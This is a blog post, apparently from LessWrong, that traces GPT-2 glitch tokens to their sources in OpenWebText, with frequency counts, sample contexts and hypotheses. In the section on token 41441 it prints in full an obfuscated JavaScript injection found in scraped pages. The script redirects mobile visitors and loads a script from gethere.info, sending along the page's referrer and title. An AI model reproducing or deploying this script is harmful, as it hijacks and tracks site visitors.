It seems like if the SCP hypothesis is true, block characters should cause it to act strangely.
It does!
'What is \'████████\'?\n\nThis term comes from the Latin for "to know". It'
'What is \'████████\'?\n\n"████████" is a Latin for "I am not",'
Putting it in the middle of code sometimes causes it to spontaneously switch to an SCP story:
' for i in █████.\n\n"I\'m not a scientist!"\n\n- Dr'
' for i in █████,\n\n[REDACTED]\n\n[REDACTED]\n\n[REDACTED] [REDACTED]\n\n[REDACTED]'
I laughed out loud at the SCP hypothesis. Love it. What a warped mirror the Shoggoths hold up to us, casting back unexpected pieces of our own behaviors in strange contexts.
Satisfying to see these glitch issues tracked down to their sources. Nice work.
This is a collection of every unidentified GPT2 glitch token listed in the third glitch token archaeology post. I was able to find the source of every single one, except for "?????-" and "?????-?????-"[1]. Please tell me if I missed one, or you've discovered one and don't understand where it came from. This isn't meant to be a well-written analysis, just a quick repository of my glitch-hunting observations.
I plan on writing up and categorizing all of these in greater detail in future posts; the first is here.
I used OpenWebText, a recreation of GPT2's training data, for all experiments in this post. I tokenized every .gz file in the archive and made a boolean NumPy array marking each token that was present at least once in each file. This allowed me to quickly identify infrequent tokens in the dataset and pull up their textual context with regular expressions. If there was an issue with overlap, I used a tokenizer-based extraction instead. All data/code available upon request.
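A minimal sketch of that pipeline (my reconstruction, not the exact code; the file layout and the shape of the presence array are assumptions on my part):

import gzip, re
import numpy as np
from glob import glob
from transformers import GPT2TokenizerFast

tok = GPT2TokenizerFast.from_pretrained("gpt2")
VOCAB = len(tok)                                # 50257 for GPT-2
files = sorted(glob("openwebtext/*.gz"))        # assumed layout of the archive

# presence[i, t] == True iff token t appears at least once in file i
presence = np.zeros((len(files), VOCAB), dtype=bool)
for i, path in enumerate(files):
    with gzip.open(path, "rt", encoding="utf-8", errors="ignore") as f:
        ids = tok(f.read())["input_ids"]
    presence[i, np.unique(ids)] = True

file_counts = presence.sum(axis=0)              # number of files each token appears in
rare = np.argsort(file_counts)[:50]             # the lowest-frequency tokens

# pull up textual context for a rare token with a plain regex search
needle = re.escape(tok.decode([int(rare[0])]))
for path in files[:5]:
    with gzip.open(path, "rt", encoding="utf-8", errors="ignore") as f:
        text = f.read()
    for m in re.finditer(needle, text):
        print(path, text[max(0, m.start() - 80):m.end() + 80])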
The leftmost column is the token ID, the middle is the token string, and the right column is the number of files the token was present in (out of 20610). GPT2 has 50257 total tokens.
GPT2 tokens with the lowest frequency in OpenWebText
Unfortunately, formatting issues are causing tokens 188-221 to display as corrupted or blank. They are \x00 to \x09, among other ASCII sequences. I'm not sure how often GPT2 actually saw these tokens.
Note how much overlap there is with the glitch tokens documented in the 3rd SolidGoldMagikarp investigation post! I've tested many of these low/null-frequency tokens, and most of them indeed behave as glitch tokens.
SolidGoldMagikarp III: Glitch token archaeology — LessWrong
Similarly, most documented glitch tokens also had low occurrence in the dataset. I will remark upon the exceptions later.
Glitch Tokens and Where They Came From
48193 @#& 25
# of instances of the token of interest in each file:
[3299, 4, 3, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
This was present in 25 files; 24 of them contained 1-4 instances of profanity censoring ("God f@#&ing damn"), and the one exception contained >3000 instances.
ComputerCraft code
Other users helped me identify it as being part of a script for ComputerCraft, a Minecraft mod.
35496 ÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂ 26
[1184, 1127, 1126, 1041, 1035, 966, 825, 768, 518, 224, 128, 128, 96, 84, 68, 32, 30, 28, 22, 16, 8, 4, 4, 2, 2, 2] (sum=9468) (these are non-overlapping instances)
There are tokens for repeating "ÃÂ" sequences of length 1, 2, 4, 8, 16, 32, and 64 (a toy sketch of why the lengths are powers of two follows at the end of this entry). Others pointed out that this is a common formatting issue with online text. But why were sequences of length 64 so common as to get tokenized?
It's literally because of one website, archive.org.
It seems that archive.org hosts a few old comments with massive chunks of such text - 600,000+ total ÃÂ characters, in fact, across dozens of pages. Although similar text exists on other sites, it is far rarer, and archive.org was also the only source of the length-16+ ÃÂ tokens in the dataset, meaning it was likely the sole reason those tokens were ever present in the final tokenizer.
That said, I did see this post before my investigation, but guessed that something would have interrupted the sequence before it got to perfect sequences of thousands of letters. Obviously I was wrong.
In any case, ÃÂ sequences were rare enough that none (not even "ÃÂ"!) were included in the tokenizers for GPT3.5/GPT4 or GPT4o.
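A toy illustration of why the lengths come out as powers of two (my own sketch, not the actual tokenizer-training code): in a uniform run, each merge BPE learns simply doubles the repeated unit.

run = ["ÃÂ"] * 64
vocab = {"ÃÂ"}
while len(run) > 1:
    pair = run[0] + run[1]            # the only, and therefore most frequent, adjacent pair
    vocab.add(pair)                   # BPE learns this merge...
    run = [pair] * (len(run) // 2)    # ...and applying it halves the run
print(sorted(len(t) // 2 for t in vocab))   # -> [1, 2, 4, 8, 16, 32, 64] repeats of "ÃÂ"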
31727 cffff 156
This token was commonly found in World of Warcraft chat and auction scrapes. It, alongside "cffffcc", is also part of hex color codes. GPT2 almost always completes a prompt consisting of just "cffffcc" as "cffffcc00" followed by code. "cffffcc00" is hex for yellow, and apparently it's commonly used to color text for WoW notifications.
GPT2 completions from "cffffcc" as prompt
These turned out to be quite similar to chat and hotkey commands for Warcraft and DOTA, and also the exact type of stuff that would get scraped from Github. "cffffcc" was not present at all in OpenWebText, although "cffff" was part of various WoW chat log scrapes, where it was used to set text color.
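For what it's worth, the "yellow" reading checks out if we assume the hex digits follow WoW's |cAARRGGBB escape layout (the layout is my assumption, not something verified from the dataset):

# Parse "ffffcc00" as alpha + RGB (assumed AARRGGBB layout) to sanity-check the color claim.
code = "ffffcc00"
alpha, rgb = code[:2], code[2:]
print(int(alpha, 16), tuple(int(rgb[i:i + 2], 16) for i in (0, 2, 4)))
# -> 255 (255, 204, 0): fully opaque gold/yellow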
(7131 '][' 20471) and (3693 '.[' 20604) and (42669 ').[' 19013) and (42924 '".[' 19219)
These were interesting as '.[' was the most commonly occurring glitch token (other than \x00, the ASCII null character). It was in 20604/20610 files.
Most were part of references, mostly from Wikipedia. The remainder was code, JavaScript if I recall correctly.
Wikipedia Entries
31708 ーン 635
"ーン" is often part of transliterated English words. A common example was as part of "ブロックチェーン" (Burokku chēn), which is just the Japanese pronunciation of Blockchain. There was also some stuff about the Rothschilds.
Crypto spam
Prompting GPT2 with just "ーン" mostly results in very specifically Puzzle & Dragons content, referencing キン肉族超人予言書, 裏覚醒, and other common elements in the series. My best guess is that it's another member of the Dragon cluster.
48396 ÛÛ 3
[494, 155, 494]
It's part of the description text on torrent sites for cracked video games. Whoever wrote this did not think highly of CODEX.
ÛÛ
24440 ュ 1338
"通常のプレビュ" (preview) is present on every post on 2ch, a popular Japanese imageboard.
Also, 天空龍ラッシュ! ("Sky Dragon Rush!") is a location in P&D, so add another to the Dragon cluster.
39165 catentry 4
[194, 180, 73, 9]
It's part of a format used for inventory management.
39253 UCHIJ 5
[340, 262, 234, 36, 8]
Always part of the string "UCHIJAAAA", which appears next to mod names in Minecraft (Forge) crash logs.
UCHIJAAAA
47182 :""},{ 21 // 23785 "]=> 32 // 32047 "$:/ 3
// 47182 :""},{ 21
Parts of code.
21807 \\\\\\\\ 45
Long sequences of the above are common on bitcoinmagazine.com. There is also ASCII art.
\\\\\\\\
\\\\\\\\\\\\\\\'s time for some investigation. The results are somewhat counter-intuitive. That makes the wh", "y looked at on a day to day basis.Value changes are measured as relative or percentage changes. That\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'s because only relative changes are comparable between different assets and over time. To gi", "ty tells us how much the BTC vs USD exchange rate disperses around the mean over a given period. Let\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'s look at some more historical data to put the Bitcoin volatility into perspective.Thinking of historical Bitcoin volatility, it\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'s no big news that it was going through the roof. Ho", "he Bitcoin volatility into perspective.Thinking of historical Bitcoin volatility, it\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'s no big news that it was going through the roof. However, what does deserve attention is ho", 'ing 2013. Absolute changes in that time were massive. But looking at relative figures tells us, that\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'s not the whole story
17629 practition 13
I took that to be a personal challenge! I did a more comprehensive writeup here.
That's " practition" with a space. It is not a tokenization of " practitioner" or " practitioners", since those have their own tokenizations. The examples in the dataset were mis-spellings, line breaks, and rare variants like "practitioning".
My go-to answer for such situations is that the tokenizer behavior was bugged or changed during training. But that doesn't work here, since we see the exact same pattern for the GPT4o tokenizer!
This one took me days to work out, but the results were illuminating.
It started when I found a similar pattern with a lot of low-frequency tokens that seem like parts of common words.
token examples
Others on LessWrong suggested that BPE, the process used to make the tokens in the first place, was responsible for this.
So it looks like ultra-low-frequency tokens were culled, but the cutoff wasn't high enough to catch everything: some surviving tokens are still rare enough to exhibit glitch behavior. This obviously solves itself with more data, so I would be extremely surprised if " practition" has glitch behavior in GPT4/GPT4o.
41441 \\- 645
Code element for... something.
Unknown Code
\n\nvar _0x446d=[“\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E”,”\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66″,”\\x63\\x6F\\x6F\\x6B\\x69\\x65″,”\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74″,”\\x76\\x65\\x6E\\x64\\x6F\\x72″,”\\x6F\\x70\\x65\\x72\\x61″,”\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x67\\x65\\x74\\x68\\x65\\x72\\x65\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x6B\\x74\\x2F\\x3F\\x32\\x36\\x34\\x64\\x70\\x72\\x26″,”\\x67\\x6F\\x6F\\x67\\x6C\\x65\\x62\\x6F\\x74″,”\\x74\\x65\\x73\\x74″,”\\x73\\x75\\x62\\x73\\x74\\x72″,”\\x67\\x65\\x74\\x54\\x69\\x6D\\x65″,”\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E\\x3D\\x31\\x3B\\x20\\x70\\x61\\x74\\x68\\x3D\\x2F\\x3B\\x65\\x78\\x70\\x69\\x72\\x65\\x73\\x3D”,”\\x74\\x6F\\x55\\x54\\x43\\x53\\x74\\x72\\x69\\x6E\\x67″,”\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var 
_0xd052=[“\\x73\\x63\\x72\\x69\\x70\\x74″,”\\x63\\x72\\x65\\x61\\x74\\x65\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74″,”\\x73\\x72\\x63″,”\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x67\\x65\\x74\\x68\\x65\\x72\\x65\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x6B\\x74\\x2F\\x3F\\x33\\x63\\x58\\x66\\x71\\x6B\\x26\\x73\\x65\\x5F\\x72\\x65\\x66\\x65\\x72\\x72\\x65\\x72\\x3D”,”\\x72\\x65\\x66\\x65\\x72\\x72\\x65\\x72″,”\\x26\\x64\\x65\\x66\\x61\\x75\\x6C\\x74\\x5F\\x6B\\x65\\x79\\x77\\x6F\\x72\\x64\\x3D”,”\\x74\\x69\\x74\\x6C\\x65″,”\\x26″,”\\x3F”,”\\x72\\x65\\x70\\x6C\\x61\\x63\\x65″,”\\x73\\x65\\x61\\x72\\x63\\x68″,”\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E”,”\\x26\\x66\\x72\\x6D\\x3D\\x73\\x63\\x72\\x69\\x70\\x74″,”\\x63\\x75\\x72\\x72\\x65\\x6E\\x74\\x53\\x63\\x72\\x69\\x70\\x74″,”\\x69\\x6E\\x73\\x65\\x72\\x74\\x42\\x65\\x66\\x6F\\x72\\x65″,”\\x70\\x61\\x72\\x65\\x6E\\x74\\x4E\\x6F\\x64\\x65″,”\\x61\\x70\\x70\\x65\\x6E\\x64\\x43\\x68\\x69\\x6C\\x64″,”\\x68\\x65\\x61\\x64″,”\\x67\\x65\\x74\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\\x73\\x42\\x79\\x54\\x61\\x67\\x4E\\x61\\x6D\\x65″,”\\x70\\x72\\x6F\\x74\\x6F\\x63\\x6F\\x6C”,”\\x68\\x74\\x74\\x70\\x73\\x3A”,”\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66″,”\\x52\\x5F\\x50\\x41\\x54\\x48″,”\\x54\\x68\\x65\\x20\\x77\\x65\\x62\\x73\\x69\\x74\\x65\\x20\\x77\\x6F\\x72\\x6B\\x73\\x20\\x6F\\x6E\\x20\\x48\\x54\\x54\\x50\\x53\\x2E\\x20\\x54\\x68\\x65\\x20\\x74\\x72\\x61\\x63\\x6B\\x65\\x72\\x20\\x6D\\x75\\x73\\x74\\x20\\x75\\x73\\x65\\x20\\x48\\x54\\x54\\x50\\x53\\x20\\x74\\x6F\\x6F\\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}
This exact code was present in many different articles, often appearing in the middle of text. I don't know where to begin. Maybe it's something related to mobile devices?
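Decoding the hex escapes at least shows what the script touches; a quick sketch (the escapes are plain ASCII byte codes, and the sample strings below are copied from the first array):

# Decode a few of the hex-escaped strings from the obfuscated script above.
import codecs

samples = [
    r"\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E",
    r"\x63\x6F\x6F\x6B\x69\x65",
    r"\x75\x73\x65\x72\x41\x67\x65\x6E\x74",
    r"\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F",
]
for s in samples:
    print(codecs.decode(s, "unicode_escape"))
# -> _mauthtoken, cookie, userAgent, http://gethere.info/kt/

The decoded names (a cookie, the user agent, a redirect URL) do look consistent with the mobile-device guess: it reads like an obfuscated script that inspects the user agent and redirects phone visitors, injected into the pages it was scraped from.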
31666 ?????-?????- 0
Zero appearances. "?????-" appeared 3 times, as Twitter-embed errors on webpages. Or maybe it's some other encoding issue?
The actual tweet was in Hindi.
I still have no idea what is going on here. Any help will be appreciated.
?????-
49781 EngineDebug 3
[239, 63, 1]
Part of "UnityEngineDebugBin". The example below came from a Steam error log for RimWorld.
Unity is a common video game engine.
UnityEngineDebugBin
42470 TextColor 97
[215, 80, 74, 57, 22, 17, 15, 15, 11, 10, 10, 10, 10, 8, 8, 7, 6, 6, 6, 6, 6, 6, 5, 5, 4, 4, 4, 4, 4, 3]
Common code element. The biggest contributor was a cheat script for Path of Exile.
Path of Exile cheat script
43177 EStreamFrame 0 | 39906 EStream 0
GPT2 was very insistent that these were some sort of code. "EStream" in particular always continued as "EStreamControl".
Turns out it's part of a Python Steam library module called enums.
41383 assetsadobe 0
Always continues as "assetsadobe.com/is/image/content/dam/tnc/nature/en/photos".
A Google search showed that it's common on nature.org.
Nature.org is probably also the source of the "natureconservancy" glitch token.
Non-English Languages
There is surprisingly little bilingual Russian/English text in the dataset. Most Russian is present as large chunks of entirely Russian text. Wikipedia text is occasionally bilingual, which means that ignoring the Russian portion likely increases accuracy for English token prediction.
Note that it isn't just "к" that is a glitch token. Other letters like "и" also have the same property. Russian is also generally rare in the training data - some Cyrillic characters are multi-token.
This is something that also applies to other languages, like Japanese. Also note that Chinese text was almost certainly intentionally excluded from the tokenizer training set - the full-width comma "，" required 3 tokens, even though it is arguably the most common form of Chinese punctuation! This does not apply to punctuation also common in Japanese like "、" and "。", both being single-token. Although Wikipedia and some other sources will claim that Japanese also uses the full-width comma, it was extremely rare in the dataset.
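A quick way to check those token counts, assuming the standard Hugging Face gpt2 tokenizer matches the one used for training:

from transformers import GPT2TokenizerFast

tok = GPT2TokenizerFast.from_pretrained("gpt2")
print(len(tok.encode("，")))   # full-width comma: 3 byte-level tokens, per the claim above
print(len(tok.encode("、")))   # Japanese comma: expected 1
print(len(tok.encode("。")))   # Japanese full stop: expected 1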
Hypotheses
Why does this happen?
Firstly, my intuition about low-frequency tokens often being glitch tokens proved true - to a degree. It wasn't just raw frequency, but rather frequency in context. If a particular token doesn't provide extra information about the following tokens, GPT2 will be trained to pay less attention to it.
Take the following example:
At GPT2's level of capability, "天狗" (tengu) doesn't provide extra information compared to "Tengu" or the other English words around it. It learns (rightfully) to ignore Japanese text in the middle of English text. In fact, this means it should treat such tokens as null, not even as blank space. All the attention from the rest of the prompt should be shifted one token forward, as though the glitch token never existed. This is the behavior we in fact observe!
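One way to test the "as though it never existed" claim (my sketch, not the author's interpretability setup): compare the next-token prediction for a prompt with and without the uninformative tokens spliced in.

import torch
from transformers import GPT2LMHeadModel, GPT2TokenizerFast

tok = GPT2TokenizerFast.from_pretrained("gpt2")
model = GPT2LMHeadModel.from_pretrained("gpt2").eval()

def next_token_logits(text):
    ids = tok(text, return_tensors="pt").input_ids
    with torch.no_grad():
        return model(ids).logits[0, -1]

clean = next_token_logits("The tengu is a creature from Japanese")
spliced = next_token_logits("The tengu 天狗 is a creature from Japanese")
# If the spliced-in tokens are truly treated as absent, the top prediction should barely change.
print(tok.decode([int(clean.argmax())]), tok.decode([int(spliced.argmax())]))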
Now consider the testing condition:
All the other tokens are pointing towards the location of "天狗", greatly increasing its impact on the subsequent tokens generated. At this point, one of three things happens:
Let's take the glitch token set of "ÃÂÃÂ" and friends. They almost never convey information in any context. We would expect them to do only two things:
This is also the exact behavior we observe!
GPT2 generations
I would also go further and say that this is the default behavior for any token which either doesn't convey information in a particular context or doesn't appear in the training set at all. So much of the internet is something like:
Here the best way to predict the next natural-language token is to ignore anything that doesn't belong in natural language: pass the information in the natural-language tokens through the glitch tokens as though they aren't there, and use it to predict further natural-language tokens. This is pretty much what we observe.
I also have a hypothesis that having your vocabulary include tokens which look long and unnatural in natural language helps mitigate catastrophic forgetting. Imagine that your coding training data includes a lot of uses of a function named "rawdownloadcloneembedreportprint". If you tokenize it as several English words, the relationships between those words in natural language will begin to break down as the model encounters more coding data with that function. Tokenizing it as a single token helps prevent this.
There is also a subset of glitch tokens which tend to "take over" when encountered in natural language. They tend to occur in a context with a lot of natural-language tokens, but in an unusual distribution. An example is <45563 'ⓘ' 27>[2], which was mostly present in a long list of something geology-related (a list of geological surveys?). In the context of "What is the meaning of", it'll either give a vague but coherent geology-related answer, or go back to listing geological surveys. This behavior also occurs for "petertodd"/"ertodd" and crypto spam. GPT2 is able to tell that they vaguely belong in natural language, but they have such a strong influence on the following text that they often "take over". This behavior decreases as model size increases, with "ertodd" consistently displaying this behavior on the smallest GPT2 model, but rarely on the largest.
I am now very confused about why all the other discussion of glitch tokens (including my own, from just a week ago!) sounds so confused. This seems very simple and intuitive, and I am utterly shocked I haven't seen anyone else write this exact analysis. It probably exists out there, and I just haven't seen it.
tl;dr: glitch tokens are ignored because they don't convey information in the context where they're used. Information is passed through them as though they don't exist. This sounds extremely obvious in hindsight.
Glitch token classifications
In conclusion, I think we can divide glitch tokens into 3 main categories.
Future Research Plans
I'm currently using interpretability tools to identify the exact changes glitch tokens cause to generated text.
Addendum: The SCP hypothesis
Where on the internet is an "information-less" token often present somewhere you would expect a normal (conversational) word?
That's right, SCP articles.
This might explain why a direct interrogative like "What is the nature of <glitch token>?" sometimes results in a creepy/unnerving/existential answer.
I'm only including this because it's funny; I give it <1% probability of having a significant effect.
I'm counting UTF-8 control characters as resolved here, but those honestly need their own post.
Looks like scrapes from https://www.mindat.org/?
Example text from OpenWebText:
Lowville quartz locality Walter, M., Chamberlain, S.C. (2013) The Lowville quartz occurrence, Lewis County, NY. The 40th Rochester Mineralogical Symposium, Contributed Papers in Specimen Mineralogy, 29-30.\n\nNorth Carolina Gaston Co. ⓘ Crowders Mountain State Park Espenshade, Gilbert H. and Potter, Donald B. (1960) Kyanite,Sillimanite And Andalusite Deposits of the Southeastern States: Geological Survey Professional Paper 336\n\nOregon Lane Co. Black Butte District ⓘ Hobart Butte Am Min (1948) 33:122-134\n\nPennsylvania Schuylkill Co. New Castle Township ⓘ Wadesville Tom Loomis specimen; Alfredo Petrov specimens; Collected by James J. "Skip" Colflesh, 2007.\n\nUtah Beaver Co. San Francisco Mts ⓘ San Francisco District (Frisco District) Petersen, Erich U., (2001) Porphyry Cu-Style Mineralization Potential In The San Francisco District, Ut. GSA Annual Meeting, November 5-8, 2001\n\nJuab Co. East Tintic Mts Tintic District ⓘ Mintintic Mine American Mineralogist, Volume 30, pages 76-77\n\nⓘ White Hi', ' District NBMG Spec. Pub. 31 Minerals of Nevada\n\nNew Hampshire Ches